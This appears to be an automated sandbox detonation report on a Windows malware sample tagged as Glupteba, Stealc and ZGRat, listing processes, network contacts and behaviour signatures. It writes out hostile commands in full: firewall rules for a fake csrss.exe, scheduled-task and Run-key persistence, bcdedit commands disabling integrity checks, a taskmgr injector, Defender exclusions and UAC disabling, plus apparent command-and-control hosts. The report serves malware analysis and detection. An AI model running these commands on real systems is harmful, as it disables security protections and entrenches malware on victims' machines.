"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"

C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe

"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"

C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe

"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"

C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240508235243.log C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab

C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe

"C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe"

C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe

"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe

"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"

C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe

"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"

C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe

"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
RU 193.233.132.234:80 tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.169.89:443 yip.su tcp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
DE 185.172.128.90:80 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.246:80 download.iolo.net tcp
DE 185.172.128.150:80 tcp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 9f16c723-2fae-4073-ae52-49abeeeb004f.uuid.thestatsfiles.ru udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 server9.thestatsfiles.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.sipgate.net udp
US 3.33.249.248:3478 stun.sipgate.net udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
DE 185.172.128.150:80 tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp

Files

memory/2604-0-0x000007FEF5053000-0x000007FEF5054000-memory.dmp

memory/2604-1-0x0000000001060000-0x000000000108A000-memory.dmp

memory/2604-2-0x0000000000FA0000-0x0000000000FFE000-memory.dmp

memory/2604-3-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

memory/2128-8-0x0000000002980000-0x0000000002A00000-memory.dmp

memory/2128-9-0x000000001B4B0000-0x000000001B792000-memory.dmp

memory/2128-10-0x0000000001C80000-0x0000000001C88000-memory.dmp

memory/2796-11-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-15-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-19-0x000000007EFDE000-0x000000007EFDF000-memory.dmp


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 23:52

Reported

2024-05-08 23:57

Platform

win10-20240404-en

Max time kernel

296s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IhdA8kGYCJ7pM22YuVOKDfB6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7gZzdgjUiY3QyM00vsQEIk5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pQJacl2Bf7LzHavCMG3hKLj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lM3zkzFQczpDAHvJH7vWTU0q.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHu5gmDPrdHQrxBALgEWcRKb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUN0CKZe3wKRDvMmRMVSstse.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vjZEleAXp56EtwGN39UQAyp2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2272 set thread context of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
